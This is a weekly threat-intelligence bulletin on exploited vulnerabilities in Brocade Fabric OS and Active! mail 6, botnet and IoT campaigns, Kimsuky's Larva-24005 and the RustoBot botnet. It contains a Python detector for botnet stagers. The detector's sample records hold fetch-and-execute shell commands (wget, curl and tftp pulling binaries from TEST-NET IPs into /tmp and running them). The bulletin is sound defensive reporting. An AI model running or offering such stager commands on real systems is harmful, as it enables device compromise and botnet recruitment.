Executive Summary
The cyber threat landscape this week reveals a troubling trend: threat actors are not just uncovering vulnerabilities but actively exploiting both legacy and recent flaws to fuel widespread attacks.
Trend Micro has confirmed in-the-wild exploitation of a critical stack-based buffer overflow vulnerability in Active! mail 6, a platform widely used in Japanese enterprises. Simultaneously, Brocade Fabric OS remains under active attack, with a privilege escalation flaw giving local users root-level control over core systems.
Botnet activity also surged, as EnemyBot, Sysrv-K, Andoryu, and Androxgh0st ramped up exploitation of known flaws in Cloud Gateway, GitLab, and PHP-based applications. On the IoT front, familiar names like Bashlite, BrickerBot, Tsunami, and Mirai aggressively targeted Eir D1000 modems, rapidly expanding their botnet infrastructure.
In the realm of cyber-espionage, AhnLab Security Intelligence Center (ASEC) attributed a new campaign to Kimsuky, the North Korean state-sponsored group. Tracked as Larva-24005, the operation abuses patched Microsoft vulnerabilities and uses a toolkit that includes RDP exploits and keyloggers.
Rounding off the week, FortiGuard Labs revealed RustoBot, a sophisticated botnet written in Rust, targeting command injection flaws in TOTOLINK and DrayTek routers. The campaign spans regions including Japan, Taiwan, Vietnam, and Mexico, further underlining how router vulnerabilities remain a top vector for mass compromise.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping defenders make informed decisions.
CVE-2025-1976
A Privilege Escalation Vulnerability in the Brocade Fabric OS stems from a flaw in the IP address validation process, allowing a local user with administrative privileges to execute arbitrary code with full root-level access. Assigned a high CVSS Score of 8.6, this vulnerability affects versions 9.1.0 through 9.1.1d6. Successful exploitation of this vulnerability enables attackers to execute any Fabric OS command and potentially modify the operating system, including custom subroutines, leading to full system compromise. Broadcom has addressed the issue in version 9.1.1d7. This vulnerability is currently under active exploitation, making it a critical concern for organizations relying on Brocade Fabric OS for secure storage network operations.
A Stack-based Buffer Overflow Vulnerability in Active! mail 6 poses a critical security risk, allowing remote unauthenticated attackers to execute arbitrary code or cause a denial-of-service (DoS) condition by sending specially crafted requests. Rated CVSS 9.8 (Critical), this flaw affects versions 6.60.05008561 and earlier. Exploitation of this vulnerability could enable attackers to take full control of the mail server or disrupt email services entirely. According to Trend Micro, this vulnerability is being actively exploited in the wild as a zero-day. To address this vulnerability, Qualitia has released an updated version, 6.60.06008562, which users are strongly advised to apply immediately.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and what is actively being scanned. As the source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. This section presents the top 5 CVEs whose payloads are suggestive of botnet activity, such as the use of wget with bare IP addresses.
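As an added illustration of the heuristic described above (the use of wget, curl or tftp with a bare IP address as a marker of botnet stagers), the following Python is example code written for this bulletin, not part of Loginsoft's Cytellite or LOVI platforms; the sensor records, rule tags and TEST-NET IP addresses are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Heuristic from the bulletin: botnet stagers fetch a second stage with a download
# tool pointed at a bare IPv4 address rather than a domain name. The pattern allows
# a scheme and port between the tool name and the address.
IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
STAGER_RE = re.compile(
    r"\b(?P<tool>wget|curl|tftp|ftpget)\b[^;&|\n]{0,80}?(?P<ip>" + IPV4 + r")",
    re.IGNORECASE,
)

def decode_payload(raw: str, rounds: int = 3) -> str:
    """URL-decode repeatedly; captured payloads are often double-encoded."""
    text = raw
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def stager_indicators(raw_payload: str):
    """Return (tool, ip) pairs found in a payload, or [] when none match."""
    text = decode_payload(raw_payload)
    return [(m.group("tool").lower(), m.group("ip")) for m in STAGER_RE.finditer(text)]

def botnet_hits_by_rule(records):
    """records: iterable of (rule_tag, raw_payload). Count botnet-like hits per rule tag."""
    hits = Counter()
    for rule, payload in records:
        if stager_indicators(payload):
            hits[rule] += 1
    return hits

def top_rules(records, n=5):
    """Rule tags ranked by number of stager-like payloads, mirroring the top-5 view."""
    return botnet_hits_by_rule(records).most_common(n)

# Constructed sensor records: rule tags are placeholders, addresses are TEST-NET ranges.
SAMPLE_RECORDS = [
    ("rule-php-cgi", "cmd=cd%20/tmp;wget%20http://198.51.100.7/bins.sh;chmod%20777%20bins.sh;sh%20bins.sh"),
    ("rule-gitlab", "cmd=curl -s 203.0.113.9:8080/x86 -o /tmp/x86"),
    ("rule-php-cgi", "cmd=echo%20hello"),                      # scanning probe, no stager
    ("rule-gateway", "url=http://updates.example.com/patch"),  # domain, not a bare IP
    ("rule-gateway", "cd /tmp || cd /var; tftp -g -r mips 192.0.2.55; ./mips"),
]

if __name__ == "__main__":
    for rule, count in top_rules(SAMPLE_RECORDS):
        print(f"{rule}: {count} stager-like payload(s)")
```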
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
RustoBot Targets TOTOLINK and DrayTek Vulnerabilities
FortiGuard Labs has recently uncovered RustoBot, a sophisticated botnet written in Rust, a memory-safe programming language renowned for its performance and security. This malware campaign targets vulnerabilities in TOTOLINK and DrayTek routers, specifically exploiting known command injection flaws to execute remote code and seize control of affected devices. RustoBot has been observed infiltrating technology infrastructures across multiple regions, including Japan, Taiwan, Vietnam, and Mexico, highlighting the botnet's expanding reach and the critical need for timely patching and robust network defense strategies.
CVE-2019-0708 and CVE-2017-11882
AhnLab Security Intelligence Center (ASEC) has identified a new malicious campaign attributed to the North Korean state-sponsored threat group Kimsuky, tracked as Larva-24005. The campaign exploits patched Microsoft flaws, notably the critical BlueKeep vulnerability (CVE-2019-0708) and the well-known Microsoft Equation Editor vulnerability (CVE-2017-11882), to gain access to target systems. Once initial access is gained, the operation deploys a dropper that installs malware such as MySpy, which gathers system information, and the RDPWrap tool to enable remote access. The campaign culminates in the use of keyloggers such as KimaLogger and RandomQuery to monitor user activity.
Active since October 2023, the campaign primarily targets South Korea’s software, energy, and finance sectors, with additional victims across Japan, the U.S., China, Germany, the U.K., Canada, and several other countries in Asia, Europe, Africa, and North America, highlighting the campaign’s broad and strategic global reach.
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities discovered, and potentially exploited, before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand.
External References
- https://asec.ahnlab.com/en/87554/
- https://thehackernews.com/2025/04/kimsuky-exploits-bluekeep-rdp.html
- https://www.fortinet.com/blog/threat-research/new-rust-botnet-rustobot-is-routed-via-routers
- https://www.jpcert.or.jp/at/2025/at250010.html
- https://www.bleepingcomputer.com/news/security/active-mail-rce-flaw-exploited-in-attacks-on-japanese-orgs/
- https://www.trendmicro.com/ja_jp/jp-security/25/d/trendnews-20250422-01.html#3